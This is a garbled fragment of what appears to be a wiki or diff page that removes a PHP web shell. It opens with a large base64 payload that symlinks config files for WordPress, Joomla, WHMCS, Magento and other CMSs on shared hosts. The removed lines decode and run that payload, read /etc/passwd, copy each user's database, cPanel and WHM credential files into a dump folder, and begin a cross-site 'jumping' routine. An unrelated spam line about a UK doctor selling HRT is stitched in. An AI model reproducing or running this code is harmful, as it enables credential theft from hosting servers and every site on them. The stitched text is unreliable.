LiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";​ +
- $file = "​idx_config/​vhost.cin";​ +
- $handle = fopen($file ,"​w+"​);​ +
- fwrite($handle ,​base64_decode($vhost));​ +
- fclose($handle);​ +
- chmod($file,​ 0755); +
- if(exe("​cd idx_config && ./​vhost.cin"​)) { +
- echo "<​center><​a href='​$link_config/​idx_config'><​font color=lime>​Done</​font></​a></​center>";​ +
- } else { +
- echo "<​center><​a href='​$link_config/​idx_config/​vhost.cin'><​font color=lime>​Done</​font></​a></​center>";​ +
- }+
  
- } else { +This UK Doctor offers HRT drugs to men after telephone consultation.
- $etc = fopen("/​etc/​passwd",​ "​r"​) or die("<​pre><​font color=red>​Can'​t read /​etc/​passwd</​font></​pre>"​);​ +
- while($passwd = fgets($etc)) { +
- if($passwd == ""​ || !$etc) { +
- echo "<​font color=red>​Can'​t read /​etc/​passwd</​font>";​ +
- } else { +
- preg_match_all('/​(.*?​):​x:/',​ $passwd, $user_config);​ +
- foreach($user_config[1] as $user_idx) { +
- $user_config_dir = "/​home/​$user_idx/​public_html/";​ +
- if(is_readable($user_config_dir)) { +
- $grab_config = array( +
- "/​home/​$user_idx/​.my.cnf"​ => "​cpanel",​ +
- "/​home/​$user_idx/​.accesshash"​ => "​WHM-accesshash",​ +
- "​$user_config_dir/​po-content/​config.php"​ => "​Popoji",​ +
- "​$user_config_dir/​vdo_config.php"​ => "​Voodoo",​ +
- "​$user_config_dir/​bw-configs/​config.ini"​ => "​BosWeb",​ +
- "​$user_config_dir/​config/​koneksi.php"​ => "​Lokomedia",​ +
- "​$user_config_dir/​lokomedia/​config/​koneksi.php"​ => "​Lokomedia",​ +
- "​$user_config_dir/​clientarea/​configuration.php"​ => "​WHMCS",​ +
- "​$user_config_dir/​whm/​configuration.php"​ => "​WHMCS",​ +
- "​$user_config_dir/​whmcs/​configuration.php"​ => "​WHMCS",​ +
- "​$user_config_dir/​forum/​config.php"​ => "​phpBB",​ +
- "​$user_config_dir/​sites/​default/​settings.php"​ => "​Drupal",​ +
- "​$user_config_dir/​config/​settings.inc.php"​ => "​PrestaShop",​ +
- "​$user_config_dir/​app/​etc/​local.xml"​ => "​Magento",​ +
- "​$user_config_dir/​joomla/​configuration.php"​ => "​Joomla",​ +
- "​$user_config_dir/​configuration.php"​ => "​Joomla",​ +
- "​$user_config_dir/​wp/​wp-config.php"​ => "​WordPress",​ +
- "​$user_config_dir/​wordpress/​wp-config.php"​ => "​WordPress",​ +
- "​$user_config_dir/​wp-config.php"​ => "​WordPress",​ +
- "​$user_config_dir/​admin/​config.php"​ => "​OpenCart",​ +
- "​$user_config_dir/​slconfig.php"​ => "​Sitelok",​ +
- "​$user_config_dir/​application/​config/​database.php"​ => "​Ellislab"​);​ +
- foreach($grab_config as $config => $nama_config) { +
- $ambil_config = file_get_contents($config);​ +
- if($ambil_config == ''​) { +
- } else { +
- $file_config = fopen("​idx_config/​$user_idx-$nama_config.txt","​w"​);​ +
- fputs($file_config,​$ambil_config);​ +
-+
-+
- }  +
-+
- }  +
-+
- echo "<​center><​href='?​dir=$dir/​idx_config'><​font color=lime>​Done</​font></​a></​center>";​ +
-+
-} elseif($_GET['​do'​] == '​jumping'​) { +
- $i = 0; +
- echo "<​div class='​margin:​ 5px auto;'>";​ +
- if(preg_match("/​hsphere/",​ $dir)) { +
- $urls = explode("​\r\n",​ $_POST['​url'​]);​ +
- if(isset($_POST['​jump'​])) { +
- echo "<​pre>";​ +
- foreach($urls as $url) { +
- $url = str_replace(array("​http://","​www."​),​ "",​ strtolower($url));​ +
- $etc = "/​etc/​passwd";​ +
- $f = fopen($etc,"​r"​);​ +
- while($gets = fgets($f)) { +
- $pecah = explode(":",​ $gets); +
- $user = $pecah[0];​ +
